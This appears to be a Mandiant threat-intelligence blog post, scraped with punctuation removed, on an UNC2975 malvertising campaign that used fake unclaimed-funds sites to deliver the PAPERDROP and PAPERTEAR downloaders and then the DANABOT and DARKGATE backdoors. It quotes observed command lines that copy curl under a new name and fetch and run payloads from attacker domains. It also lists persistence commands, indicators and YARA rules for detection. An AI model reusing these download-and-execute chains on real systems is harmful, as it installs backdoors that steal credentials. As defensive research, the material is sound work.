Opening a Can of Whoop Ads Detecting and Disrupting a Malvertising Campaign Distributing Backdoors Mandiant

pMandiant is now part of Google Cloud Learn MoreppExplore our multivendor XDR platform delivering Mandiant products and integrating with a range of leading security operations technologyppExplore the platformarrowforwardppSolve your toughest cyber security challenges with combinations of products and servicesppMitigate threats reduce risk and get back to business with the help of leading expertsppLearn morearrowforwardppView all services 47arrowforwardppMandiant specializes in cyber threat intelligence offering products services and more to support our mission to defend against cyber crimeppGet the latest insights from cyber security experts at the frontlines of threat intelligence and incident responseppMTrends 2023 reportarrowforwardppmWISEarrowforwardppLearn more about us and our mission to help organizations defend against cyber crimeppLearn morearrowforwardppGet Startedpp ppEarlier this year Mandiants Managed Defense threat hunting team identified an UNC2975 malicious advertising malvertising campaign presented to users in sponsored search engine results and social media posts consistent with activity reported in From DarkGate to DanaBot This campaign dates back to at least June 19 2023 and has abused search engine traffic and leveraged malicious advertisements to affect multiple organizations which resulted in the delivery of the DANABOT and DARKGATE backdoorsppManaged Defense worked with Advanced Practices and with the Google AntiMalvertising team to remove the malicious advertisements from the ads ecosystem and subsequently alerted other impacted organizations to also take actions against this campaignppThis blog post covers the details of recently discovered infrastructure operated by the distribution threat cluster UNC2975 which Mandiant has tracked since 2021 that leveraged malicious advertisements to trick users into visiting fake unclaimed funds themed websites In this UNC2975 campaign the malicious websites delivered PAPERDROP and PAPERTEAR downloader malware that eventually led to DANABOT and DARKGATE backdoor malware This blog post also highlights how Mandiants findings result in takedowns of malicious ad campaigns served on Google infrastructure ppMandiant currently tracks around 30 threat clusters that use malicious advertisements for the delivery of malware including backdoors data stealers and downloaders Since at least 2021 a threat actor tracked as UNC2975 has leveraged this technique to distribute downloader malware for secondstage payloads on victim endpointsppUNC2975 is a distribution threat cluster that has historically used malvertising in order to distribute the VBScriptbased downloader tracked as PAPERDROP The distribution of PAPERDROP from UNC2975s fake websites has primarily led to the deployment of the Delphibased backdoor DANABOT DANABOT is part of a MalwareasaService platform where multiple affiliates can purchase access to the service Beginning in September 2023 UNC2975s malware distribution shifted Instead of DANABOT UNC2975 deployed a Delphibased backdoor tracked as part of the DARKGATE MalwareasaService platform Due to multiple affiliates using these service platforms the distribution methods of DANABOT and DARKGATE may vary across different distribution actors ppUNC2975 creates fake websites that leverage themes such as unclaimed money family ancestry and astrologyhoroscopes to facilitate its distribution operations The threat cluster has commonly used social media advertisements to promote the fake websites but have since expanded to leverage additional platforms such as Microsoft and Google advertising ppUpon being notified of this campaign by Mandiant Managed Defense the Google AntiMalvertising team took enforcement actions and pivoted on the advertisement metadata to find additional related entries and to improve abuse detection and classification systems ppAdversaries use several sophisticated techniques including impersonating genuine businesses cloaking ie hiding malicious web pages that only get revealed under specific conditions and redirection to circumvent Google Ads verification and defense mechanisms ppTo protect users Google detects prevents and blocks abusive activity as detailed in our annual Ads Safety report Google encourages users to report suspicious advertisements they come across through either My Ad Center reporting functionality or using this formppMandiant observed the following malware families while investigating this campaignppMalware FamilyppDescriptionppPAPERDROPppPAPERDROP is a downloader written in Visual Basic Script that communicates via HTTPS It has been observed downloading DANABOT by writing it to disk and then executing itppPAPERTEARppPAPERTEAR is a downloader written in Visual Basic Script that communicates via HTTP PAPERTEAR appends a list of enumerated local processes in the initial HTTP requestppDANABOTppDANABOT is a backdoor written in Delphi that communicates using a custom binary protocol over TCP The backdoor implements a plugin framework that allows it to add capabilities via downloaded plugins DANABOTs capabilities include full system control using a VNC or RDP plugin video and screenshot capture keylogging arbitrary shell command execution and file transfer DANABOTs proxy plugin allows it to redirect or manipulate network traffic associated with targeted websites This capability is often used to capture credentials or payment data DANABOT can also extract stored credentials associated with web browsers and FTP clientspp ppNumerous observed campaigns leveraging DANABOT have been reported including UNC3379 activity associated with a coinminer campaign and a similar mechanism for DANABOT distribution using a different JS libraryppDARKGATEppDARKGATE is a Delphibased backdoor capable of performing keyboard capture shell command execution file transfer and execution and credential theft Other functions include system survey shutdown and restart taking screengrabs and controlling a cryptominer Some variants retrieve their commandandcontrol C2 or CC address from a page on the pastebincom websitepp ppMore notable instances of OSINT reporting involving DARKGATE include actors previously associated with QAKBOT leveraging DARKGATE as a payload and some insights into DARKGATEs technical architecture and useppThreat actors purchase advertisements MITRE ATTCK Technique T1583008 for malicious websites with the goal of tricking users into visiting and downloading malware T1189 which can lead to data theft and ransomware Platforms that serve advertisements such as search engines or social media can provide granular controls that allow advertisers to target specific audiences based on users geographic locations IP address range eg geofencing browsing history and device types Some of the more robust advertising platforms such as Bing and Google Ads provide even more targeting categories like age gender income level and other audience attributes These capabilities allow advertisers both legitimate and malicious to craft ads specific to their desired targets and improve the effectiveness of their campaigns This also allows malicious advertisers who are able to avoid policy enforcement to develop and retain customer profiles about the victims who interact with their ads for use in future targeting operationsppEarlier this year Managed Defenses threat hunting team identified UNC2975 advertisements presented to users in sponsored search engine results and social media posts The advertised websites were displayed in the sponsored results for searches related to unclaimed money where individuals can search for and claim funds that are held by federal or state government agencies T1583008ppWhen an unsuspecting victim clicked on a malicious advertised result they were presented with a web portal that prompted them to enter their first and last name and their state of residence in order to receive a report on purported unclaimed fundsppIn each investigation under this campaign Mandiant identified browser history artifacts on affected systems showing that a user clicked on a malicious advertisement and interacted with one of two websites claimprocessingorg or treasurydeptorgppAdvertisement PlacementppBrowser History ArtifactsppSocial Media PostppMalicious URLpp ppPage Title pp ppVisit From pp ppVisit Type ppSponsored Search Engine ResultppSearch URLpp ppMalicious URLpp ppPage Title pp ppVisit From pp ppVisit Type ppThe downloadable reports were actually ZIP archive files containing Visual Basic scripts that Mandiant identified as variants of the downloader malware families PAPERDROP and PAPERTEAR The ZIP archive and Visual Basic script filenames were based on the values the user submitted into the web form Launching the Visual Basic script from an archive file generates a process execution event that launches the script from a temporary folder path T1059005 The temporary folder path thats created is dependent on the archiving utility such as WinRAR thats used to unpack the archive fileppEventppEvent DetailsppMalicious ZIP File DownloadppFile Write Processespp ppSample Download URLspp ppSample Destination Paths ppPAPERDROP PAPERTEAR ExecutionppParent Process pp ppProcesspp ppSample Command LineppMandiant identified three different delivery chains that PAPERDROP and PAPERTEAR used to download and execute secondary payloads DANABOT and DARKGATE malware attributed to multiple UNC groups Two delivery chains leveraged a renamed version of the cURL binary curlexe T1105 to download a malicious installation package msi file T1218007 or an AutoIt executable AutoIt3exe and malicious AutoIt script au3 file T1059 Mandiant also observed PAPERDROP download and execute a malicious installation package file without using a specific transfer toolppPayload Delivery ChainsppEvent DetailsppDelivery Chain 1 Renamed cURL downloading Windows Installer Package and executing with Msiexecexe ppParent Process pp ppProcesspp ppCommand Linespp ppDelivery Chain 2 Renamed cURL downloading AutoIT executable and script fileppParent Process pp ppProcesspp ppCommand LinesppDelivery Chain 3 Windows Script Host process downloading Windows Installer Package and executing with MsiexecexeppParent Process pp ppProcesspp ppCommand LinesppThe subsequent system artifacts that were created varied depending on the backdoor payload that was delivered The postdelivery infection timelines shown in the following sections may not represent all potential artifacts as complete malware execution may have been disrupted by endpoint security software or network controlsppIn the first infection chain following PAPERDROP execution the Windows Script Host process wscriptexe performed a DNS request for the domain mesahalibutsbs and connected to the IP address 4725245173 over port 443 The process wscriptexe then executed the Windows Installer utility msiexecexe T1218007 with the command msiexec i CprogramDataHLWOIRTAA9Pbin qn to quietly install an application using the package file CprogramDataHLWOIRTAA9Pbin that masqueraded as a bin file T1036008 Next the Msiexec application launched the installer process CWindowsInstallerMSI4F8Ctmp which executed the rundll32exe command CWINDOWSsystem32rundll32exe CUsersuserAppDataLocalTempOadsoophotfpdllstart to load the inmemory dropper DLL file CUsersuserAppDataLocalTempOadsoophotfpdll and execute a function named start to decompress and deobfuscate a DANABOT payload T1218011 The rundll32exe process performed a series of writes to extensionless files under the users AppDataLocalTemp directoryppThe infected rundll32exe process communicated with the IP address 35203111228 over port 443 and the local IP address 127001 over ports 22405 and 52787 The DANABOT malware launched the command CWINDOWSsystem32rundll32exe CWINDOWSsystem32shell32dll61 22405 to open and interact with the Run dialog that is  normally accessed through the Start Menu Lastly the infected rundll32exe process executed the commands schtasks End tn MicrosoftWindowsWininetCacheTask and schtasks Run tn MicrosoftWindowsWininetCacheTask to stop and start the Wininet Cache Task T1053005 This Scheduled Task activity may be related to Wininet API hooking to intercept credentials entered into Microsoft Edge or Internet Explorer Finally the DANABOT infected rundll32exe process created and wrote to a randomly named tmp file such as CUsersuserAppDataLocalTemptmpAEA8tmp or CUsersuserAppDataLocalTempAroeihiaietwqtmpppAlthough not observed in each case Mandiant identified Run key persistence to execute the DANABOT payload in the file CUsersuserAppDataLocalTempOadsoophotfpdll using a random key value HKEYUSERSuserSOFTWAREMICROSOFTWINDOWSCURRENTVERSIONRUNHryrqsf T1547001ppIn the second infection chain the PAPERTEAR downloader performed an HTTP POST request to the host infocatalogpics over port 8080 Next the wscriptexe process executed the Windows Command Shell using an extended oneliner consisting of multiple commands shown in Figure 5ppCommand LineppCWindowsSystem32cmdexe c mkdir cyifr cd d cyifr copy cwindowssystem32curlexe yifrexe yifr H UserAgent curl o Autoit3exe httpinfocatalogpics8080 yifr o khscrkau3 httpinfocatalogpics8080msiyifrmouv Autoit3exe khscrkau3pp ppCommand BreakdownppIn the third infection chain the PAPERDROP downloader executed another extended oneliner that used a renamed curlexe binary T1105 to download and install a malicious package file that drops DANABOT T1218007 ppCommand LineppCWindowsSystem32cmdexe c cd d CUsersUSERNAMEAppDataLocalTemp copy cwindowssystem32curlexe ihcbzhYexe ihcbzhYexe o SYUxEbPzmsi httpsdurhamsoulcarelifeorgn3sqd95xk20z2b3vue9tnpiadp2j6 CWindowsSystem32msiexecexe i SYUxEbPzmsi qnpp ppCommand BreakdownppFollowing the execution of the SYUxEbPzmsi package installation the msiexecexe process created files to spoof the appearance of the Cisco Umbrella Roaming application under the directory CUsersuserAppDataRoamingCisco CorpUmbrella Roaming ClientUmbrella Roaming Client One file in the new directory CoreReborn32bin was identified as a DANABOT launcher In a separate investigation Mandiant identified a folder path that spoofed the Box Edit application and dropped a DANABOT payload to the path CUsersuserAppDataRoamingBox IncBox EditBox EditBoxLocalComServerFixEnvironmentdllppNext the Windows Installer process CWindowsInstallerMSI23C9tmp launched the DANABOT backdoor with the Rundll32 command rundll32exe CUsersuserAppDataRoamingCisco CorpUmbrella Roaming ClientUmbrella Roaming ClientCoreReborn32binstart T1218011 Once executed the DANABOT infected rundll32exe process wrote to the Windows Run key HKEYUSERSuserSOFTWAREMicrosoftWindowsCurrentVersionRunSrfshu to ensure persistent execution of the command CWINDOWSsystem32RUNDLL32EXE CUsersuserAppDataRoamingCisco CorpUmbrella Roaming ClientUmbrella Roaming ClientCoreReborn32binstart T1547001 In addition to Run key persistence Mandiant has also identified the capability for DANABOT to use a new Windows service T1543003 using the ServiceDll entry to point to the malicious DLLppSimilar to the first infection chain the infected rundll32exe performed a series of writes to extensionless files under the users AppDataLocalTemp directory and communicated with the IP address 34161810 over port 443 and the local IP address 127001 over port 15066 The DANABOT malware launched the command CWINDOWSsystem32rundll32exe CWINDOWSsystem32shell32dll61 15066 to open and interact with the Run dialog and executed the commands schtasks End tn MicrosoftWindowsWininetCacheTask and schtasks Run tn MicrosoftWindowsWininetCacheTask to stop and start the Wininet Cache Task T1053005 The DANABOT payload also modified the local proxy settings in the Windows registry T1562ppFinally the DANABOTinfected rundll32exe process wrote to a randomly named tmp file CUsersuserAppDataLocalTempPrfpdhtmpppThroughout the course of the observed malvertising campaign Mandiant encountered both PAPERDROP and PAPERTEAR Visual Basic Script VBS files in use by malicious actors to facilitate payload deploymentppThe main difference in functionality between PAPERDROP and PAPERTEAR is that PAPERDROP makes heavier use of local files to facilitate payload deployment whereas PAPERTEAR leverages direct command line executionppInitially observed by Mandiant in January 2021 in use by UNC2975 PAPERDROP is primarily associated with DANABOT payload distribution and generally has several distinct characteristics across two different build types NOTE Since 2021 PAPERDROP has been observed in use by multiple UNC groups The samples shown in this section represent a crosssection of the PAPERDROP malware family as a whole and are not specific to UNC2975 activityppThe first build type is markedly denser than the second It features prominent use of code comments complex variable names and other junk code presumably used as a rudimentary code obfuscation mechanism T1027ppIn addition to the more commonly observed mechanism for code comments leveraging single quotes Visual Basic also allows the use of the characters REM to designate code comments This can be seen in Figure 10 ppLooking through the smokescreened code reveals some interesting elements PAPERDROP seemingly leverages basic mathematical operations especially modulus or Mod as part of its execution flowppIt also does little in the way of obfuscation with regard to concealing its C2 addresses or file system path names It merely separates these values through individual function calls to add characters to progressively concatenated strings but it is possible to view the characters by simply scrolling through the file and reading them in reverse order from bottom to top see Figure 11ppSome samples of PAPERDROP build type 1 feature elaborate Sleep calls presumably in an attempt to evade sandbox detectionppConversely PAPERDROP build type 2 is much closer to PAPERTEAR in its architecture It makes limited use of smokescreenedobfuscated code in comparison to build type 1 though it still makes use of mathematical functions as part of its execution flowppWhen fully deobfuscated the core download functionality executes as shown in Figure 14ppIn the case of Figure 14 the file payload from ignitethefundcom was saved to CProgramData1DRpng though it was executed by the PAPERDROP VBS as a DLLppSimilar to PAPERDROP build type 2 PAPERTEAR is also comparatively less dense It too avoids excessive use of junk code and stays fairly direct in terms of its execution flow When executed on a host most variants of PAPERTEAR try to collect a list of running processes via Windows Management Instrumentation T1047ppPAPERTEAR will then initiate an attempt to retrieve its payload via an HTTP POST request to a remote C2 server via a WinHTTPrequest object and for certain variants appends the list of running processes it retrieves code shown in Figure 16 to the outbound HTTP request header One of the minor obfuscation methods leveraged by PAPERTEAR samples is the sporadic inclusion of curious code comments Figure 16 presumably to avoid staticbased detections and amplify code entropy In this case however identifying the literary source of the comments wasquite elementaryppFrom there PAPERTEAR will then parse the HTTP response from the C2 server and directly execute its contents on the host via ShellExecute With the limited obfuscation removed the crucial snippet of code from Figure 16 that performs this function would otherwise appear asppThis is the core differentiator between PAPERTEAR and PAPERDROP While PAPERTEAR executes commands directly from the HTTP response it receives PAPERDROP writes the contents of the HTTP response to disk prior to executing additional steps in its infection chain PAPERTEAR is primarily associated with the distribution of DARKGATE payloads and is suspected to be integrated directly into the DARKGATE malware build processppMandiant has been disseminating intelligence on UNC2975s campaign within Mandiant Advantage providing our customers with notable and dynamic updates regarding changes in tactics and techniques the introduction of tools with new capabilities and the use of new infrastructure UNC2975 has used to carry out its mission ppMandiant tracks separate campaigns for each distribution method or actors delivering the MalwareasaService backdoor DARKGATE To differentiate between the initial malware distribution DARKGATE infrastructure and followon activity Mandiant tracks each part of the intrusion as separate clusters until further overlaps are identified and warrant merging Mandiant tracks the DARKGATE MalwareasaService infrastructure and associated payloads as UNC5085 while separately clustering the different distribution methods and any followon actorsppSee our previous blog post for more insights into how Mandiant can help Gain Visibility Into Attacker Activity with Threat Campaigns The following campaigns within Mandiant Advantage are associated with recent DARKGATE distribution actors and followon activity ppCampaign NumberppCampaignppActorsppCAMP23045ppSuspected Financially Motivated Actor Phishing Employees via LinkedIn to Distribute DARKGATE Backdoorpp pp ppUNC4962 DistributionppUNC5085 DARKGATEppCAMP23046ppFinancially Motivated Threat Actor Using Social Media and SEO Poisoning to Compromise User with PAPERDROP and DANABOTppUNC2975 DistributionppUNC5085 DARKGATEppCAMP23050ppFinancially Motivated Actor Distributing DARKGATE via Microsoft TeamsppUNC5051 DistributionppUNC5085 DARKGATEppCAMP23051ppDistribution Cluster UNC2500 Emerges After Hiatus to Distribute Various Payloads Downloaded from Links in Phishing EmailsppUNC2500 DistributionppUNC5085 DARKGATEppCAMP23053ppFinancially Motivated Threat Actor Leveraging DARKGATE Access to Deploy BASTA RansomwareppUNC2500 DistributionppUNC4393 FollowonppIn MTrends 2023 the three most common initial access techniques Mandiant observed related to workstation compromise were phishing T1566 driveby compromise T1189 and replication through removable media T1091 Within the category of driveby compromise Mandiant has observed an increase from 2022 to 2023 in the number of investigations involving malicious advertisements where the initial infection vector was able to be identified More broadly in 2022 alone Google removed over 52 billion ads restricted over 43 billion ads and suspended over 67 million advertiser accounts While it is unlikely that malvertising will cease to be a viable attack vector for threat actors maintaining a level of response readiness when such threats are identified is key to being able to neutralize campaigns in their early stages In this case Mandiant Managed Defense in partnership with Mandiant Intelligence and the Google Ads team was successfully able to protect users on a granular hostbased level as well as at a global scale across the Google ecosystemppMandiants Managed Defense threat hunting team focuses on identifying behaviors associated with threat actors and endpoint compromises especially those that dont typically generate productbased alerts By focusing on behavioral indicators we can identify evidence of different types of compromise such as malware execution or a threat actor profiling an environment using discovery commands Like all security analysts when we identify evidence of compromise we analyze the data to try to answer the question How was the system initially compromised Performing a deeper dive to identify the initial infection vector and related timeline events provides two benefits 1 the ability to identify campaigns through repeated use of infrastructure and indicators and 2 additional malware or behavioral artifacts that can be used to create or expand existing detections event correlations and threat hunting missions The Detection Opportunities section of this blog post includes commands and artifacts that Mandiant discovered beyond the initial detection events that were used to create additional signatures to identify future activity fasterppSecurity analysts can use the following events as input for testing new or existing signatures for contextbased detection or alertingppDetection OpportunityppMITRE ATTCK TechniquesppEvent DetailsppMsiexec installing package with masquerading file extensionppT1218007 T1036008ppParent Processpp ppProcess pp ppCommand LineppRundll32 opening the Run Dialog via shell32dllppT1218011ppParent Processpp ppProcess pp ppCommand LineppAnomalous Rundll32 file writes to Temp directoryppT1218011ppProcess pp ppFiles WrittenppWindows Script Host executing file in compressed archiveppT1059005 T1204002ppParent Processpp ppProcess pp ppCommand LineppMsiexec installing package located under ProgramDatappT1218007ppParent Processpp ppProcess pp ppCommand LineppAutoIt script file payload downloaded via commandlineppT1105ppParent Processpp ppProcess pp ppCommand Line ppcURL binary copied via commandlineppT1036003ppParent Processpp ppProcess pp ppCommand Line ppSuspected renamed cURL binary executionppT1105 T1036003ppParent Processpp ppProcess pp ppCommand Linepp ppUserAgentppMasquerading cURL downloading MSI fileppT1105 T1036003ppParent Processpp ppProcess pp ppCommand LineppSchtasks used to stop WININET Cache TaskppT1053005ppParent Processpp ppProcess pp ppCommand LineppSchtasks used to start WININET Cache TaskppT1053005ppParent Processpp ppProcess pp ppCommand LineppRundll32 loading DLL file with anomalous extensionppT1218011 T1036008ppProcess pp ppCommand Linepp ppImage LoadppRundll32 modifying local proxy settingsppT1218011 T1562ppProcess pp ppRegistry KeysppRegistry Run key with Rundll32 command in text value ppT1547001 T1218011ppRegistry Keypp ppText ValueppRundll32 process creating Run key persistenceppT1547001 T1218011ppProcess pp ppRegistry Keypp ppText ValueppRundll32 execution of file under AppDatappT1218011ppParent Processpp ppProcess pp ppCommand LineppTypeppValueppCampaignppMalware FamilyppAttributionppDomainppwwwclaimprocessingorgpp23046ppUNC2975ppDomainppwwwtreasurydeptorgpp23046ppUNC2975ppDomainppwwwassetfinderorgpp23046ppUNC2975ppDomainppgfindorgpp23046ppUNC2975ppDomainppclaimunclaimedorgpp23046ppUNC2975ppDomainpptreasurydeptorgpp23046ppUNC2975ppDomainppwwwmyunclaimedcashorgpp23046ppUNC2975ppDomainppfreelookuporgpp23046ppUNC2975ppDomainppcapitalfindersorgpp23046ppUNC2975ppDomainppplanosoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainpppittsburghsoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainppdurhamsoulcarelifeorgpp23046ppPAPERDROPppUNC2975ppDomainppmesahalibutsbspp23046ppPAPERDROPppUNC2975ppDomainpparlingtonbarracudassbspp23046ppPAPERDROPppUNC2975ppDomainpplugbaratoppp23046ppPAPERDROPppUNC2975ppDomainpplewrutoppp23046ppPAPERDROPppUNC2975ppDomainppinfocatalogpicspp23046ppDARKGATEppUNC5085ppDomainppbikeontopshoppp23046ppDARKGATEppUNC5085ppDomainpppositivereviewcloudpp23046ppDARKGATEppUNC5085ppDomainppdreamteamupshoppp23046ppDARKGATEppUNC5085ppDomainppwhatupcloudpp23046ppDARKGATEppUNC5085ppDomainppthebesttimebuzzpp23046ppDARKGATEppUNC5085ppIP Addresspp472531651pp23046ppUNC2975ppIP Addresspp820999230pp23046ppUNC2975ppIP Addresspp4725245173pp23046ppUNC2975ppIP Addresspp4725233131pp23046ppUNC2975ppIP Addresspp4725314112pp23046ppUNC2975ppIP Addresspp4725245173pp23046ppUNC2975ppIP Addresspp34161810pp23046ppDANABOTppIP Addresspp3524719472pp23046ppDANABOTppIP Addresspp35203111228pp23046ppDANABOTppIP Addresspp94228169143pp23051ppPAPERTEARppUNC5085ppMD5pp9f9c5a1269667171e1ac328f7f7f6cb3pp23046ppDARKGATEppUNC5085ppMD5pp2c16eafd0023ea5cb8e9537da442047epp23046ppPAPERDROP Type IppUNC2975ppMD5pp7544f5bb88ad481f720a9d9f94d95b30pp23046ppPAPERDROPppType IppUNC2975ppMD5pp862a42a91b5734062d47c37fdd80c633ppPAPERDROPppType IIppUNC2956ppMD5pp650b0b12b21e9664d5c771d78738cf9fppPAPERTEARppUNC5085ppMD5pp9120c82b0920b9db39894107b5494ccdpp23051ppPAPERTEARppUNC5085pprule MDownloaderPAPERDROP1pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        v11  missing from UIHFad computerpp        v12  Dim UIHFadset UIHFad  CreateObjectADODBStreampp        v21  a  QJWRWIIPQLYYREESORpp        v22  temp  temp  ChrWDictItemMiday12pp        v31  ChrWDictItemMidpp        v32  12pp        v33   Mod 2  0 and Dictcount  256  thenpp        v41    CreateObjectpp        v42   Mod 2  0 and pp        v43  Executepp        v44  if w Mod 2  0 and wcount  w thenx0ax0d12wAdd Midww12pp pp    conditionpp        uint1600x5A4D and  all of v1 or all of v2 or all of v3 or all of v4pppprule MDownloaderPAPERDROP2pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  ScriptingDictionarypp        str2  CreateObjectpp        str3  Executepp        str4  Mod 2  0 andpp        str5  WScriptSleeppp        str6   Timerpp        str7  Rndpp        str8  nP  nP  Cpp pp    conditionpp        all of thempppprule MDownloaderPAPERDROP3pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  vbSystemModalvbCriticalpp        str2  CreateObjectWScriptShellpp        str3  MSXML2ServerXMLHTTPpp        str4  ADODBStreampp        str5  winmgmtsWin32Processpp        str8  createpp pp    conditionpp        all of thempppprule MDownloaderPAPERDROP4pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  12pp        str2  CreateObjectpp        str3  Executepp        str4  Mod 2  0 and Dictcount  256 thenpp        str5   httpspp pp    conditionpp        all of thempppprule MDownloaderPAPERTEAR1pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        s1  setRequestHeader a allprocess ascii pp        s2  CreateObject ascii pp        s3  Select  from Win32Process ascii pp        s4  For Each asciipp        s5  HTTP ascii pp pp    conditionpp        filesize  1MB and all of spppprule MDownloaderPAPERTEAR2pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1  WinHTTPRequest asciipp        str2  ShellExecute asciipp        str3  Open post asciipp        str4  responseText asciipp        str5  ShellApplication asciipp pp    conditionpp        all of them and filesize  5MBpppprule MBackdoorDARKGATE1 pppp    metapp        author Mandiantpp        disclaimer This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1 IF NOT FILEEXISTS PROGRAMFILESDIR  AND USERNAME SYSTEM THEN pp        str2 BINARYTOSTRING 0x  pp        str3 CProgram Files x86Sophos pp        str4 EXECUTE BINARYTOSTRING 0x pp        str5 DLLSTRUCTCREATEpp        str6 446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368722839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824pp pp    conditionpp        all of them and filesize 500KBpppprule MBackdoorDARKGATE2 pppp    metapp        author Mandiantpp        disclaimer This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        str1 IF NOT FILEEXISTS PROGRAMFILESDIR AND  USERNAME SYSTEM THEN pp        str2 BINARYTOSTRING 0x  pp        str3 CProgram Files x86Sophos pp        str4 EXECUTE BINARYTOSTRING 0x pp        str5 DLLSTRUCTCREATE pp        str6 00C680A438000045C680A538000000C680A638000049C680A738000000C680A83800004EC680A938000000C680AA38000046 pp        str7 CF013183C0024B75D28B420403C28BD08BC28BC82B4DD48B5DDC3B8BA400000072A68B45DC8B40288945E48B45E80345E4FF pp        str8 446C6C43616C6C28227573657233322E646C6C222C20226C726573756C74222C20224322266368Ω22839372926226C6C57696E646F7750726F63222C2022707472222C20446C6C5374727563744765745074722824 pp pp    conditionpp        all of thempppprule MBackdoorDARKGATE3 pppp    metapp        author  Mandiantpp        disclaimer This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        x1  SYSTEM Elevation Completed new DarkGate connection with SYSTEM privileges asciipp        x2  u 0xDark asciipp        x3  DarkGate asciipp        x4  c cmdkey generic127002 userSafeMode passdarkgatepassword0 asciipp        s1  ctempcrashtxt asciipp        s2  cookiesfile  asciipp        s3  c rmdir s q  asciipp        s4  c xcopy E I Y s s  exit asciipp        s5  UMemScan asciipp        s6  UGoogleAD asciipp        s7  untBotUtils asciipp        s8  padoru asciipp        s9  uSysHook asciipp        s10  zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT asciipp        s11  CWindowsSystem32ntdlldll fullword asciipp        s12  SYSTEM Elevation CannotI alreadyAT RAWFAILURE asciipp        s13  Stub WARNINGConfiguration updatedGlobal Ping Invoked asciipp pp    conditionpp        uint1600x5a4d and 3 of x or 2 of x and 3 of s or 1 of x and 5 of s or 6 of s or 10 of thempppprule MBackdoorDANABOT1pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        api1  ZwWow64WriteVirtualMemory64 widepp        api2  ConvertStringSecurityDescriptorToSecurityDescriptorW widepp        code1   DF 2C 01 DF 28 83 F9 08 7E 11 DF 68 08 83 F9 10 7E 06 DF 68 10 DF 7A 10 DF 7A 08 DF 3A DF 3C 11 pp        code2   8A 45 AB 04 9F 2C 1A 73 04 pp pp    conditionpp        uint1600x5A4D and uint32 uint320x3C0x00004550 and all of themppppimport pepp pprule MBackdoorDANABOT2pppp    metapp        author  Mandiantpp        disclaimer  This rule is for hunting purposes only and has not been tested to run in a production environmentpp pp    stringspp        code   A1 4 05 4 A3 4 A1 4 2B 05 4 A3 4 83 7D BC 0B pp        str1  SystemXmlXmlSerializerdll widepp        str2  SystemIOLognidll widepp        str3  ncryptdll widepp pp    conditionpp        uint1600x5A4D and uint32 uint320x3C0x00004550 and peisdll and peexportsServiceMain and peexportsstart and all of themppppOrganizations can validate their security controls using the following actions with Mandiant Security ValidationppVIDppNameppS100302ppMalicious Activity Scenario PAPERDROP and DANABOT Infection Chain Variant 1ppS100301ppMalicious Activity Scenario PAPERTEAR and DARKGATE Infection Chain Variant 1ppS100299ppMalicious Activity Scenario PAPERDROP and DANABOT Infection Chain Variant 2ppA106888ppCommand and Control PAPERTEAR Download File Attempt Variant 1ppA106781ppCommand and Control UNC2975 DNS Query Variant 1ppA106890ppCommand and Control UNC2975 DNS Query Variant 10ppA106782ppCommand and Control UNC2975 DNS Query Variant 2ppA106884ppCommand and Control UNC2975 DNS Query Variant 3ppA106872ppCommand and Control UNC2975 DNS Query Variant 4ppA106882ppCommand and Control UNC2975 DNS Query Variant 5ppA106873ppCommand and Control UNC2975 DNS Query Variant 6ppA106886ppCommand and Control UNC2975 DNS Query Variant 7ppA106875ppCommand and Control UNC2975 DNS Query Variant 8ppA106874ppCommand and Control UNC2975 DNS Query Variant 9ppA106784ppCommand and Control UNC2975 PAPERDROP DNS Query Variant 1ppA106783ppCommand and Control UNC2975 PAPERDROP HTTP GET Variant 1ppA106877ppHost CLI Launch Run Dialog via CMDppA104160ppHost CLI Registry Run KeysppA106887ppMalicious File Transfer AUTOIT Download Variant 1ppA106891ppMalicious File Transfer UNC2975 DANABOT Dropper Download Variant 1ppA106786ppMalicious File Transfer UNC2975 DANABOT Download Variant 1ppA106785ppMalicious File Transfer UNC2975 PAPERDROP Zip File Variant 1ppA106880ppMalicious File Transfer UNC5085 AUTOIT Script Containing DARKGATE Variant 1ppA151259ppProtected Theater DANABOT ExecutionppA106876ppProtected Theater DANABOT Stop and Start Wininet Cache TaskppA106879ppProtected Theater UNC2975 DANABOT Dropper Download Variant 1ppA106787ppProtected Theater UNC2975 DANABOT MSI Dropper Variant 1ppA106787ppProtected Theater UNC2975 DANABOT MSI Dropper Variant 1ppA106770ppProtected Theater UNC4962 DARKGATE Execution Variant 1ppA106871ppProtected Theater UNC5085 DARKGATE Installer Execution Variant 1ppThe authors would like to thank all of the technical reviewers and blog contributors spanning multiple teams including Managed Defense Threat Hunting Advanced Analysis AA Advanced Practices AP Mandiant Intelligence MI Google Trust and Safety Mandiant Communications Center MCC and trusted external partners Wed also like to thank the Managed Defense SOC analysts who provided investigative support responding to these campaigns to protect our customers and the Detection Engineering and Automations DEA team for contributing detection content to finding new threats faster and more effectively Credit for the creation of new Mandiant Security Validation actions goes to Lexie Aytes and the Validation Research team And a tip of the hat to Ana Foreman for the timeline graphicspppp Link to RSS feedppGet the Google Cloud Cybersecurity Forecast 2024 report to explore the latest trends on the horizonppMandiant experts are ready to answer your questionspppppppppp Copyright 2023 Mandiant All rights reservedp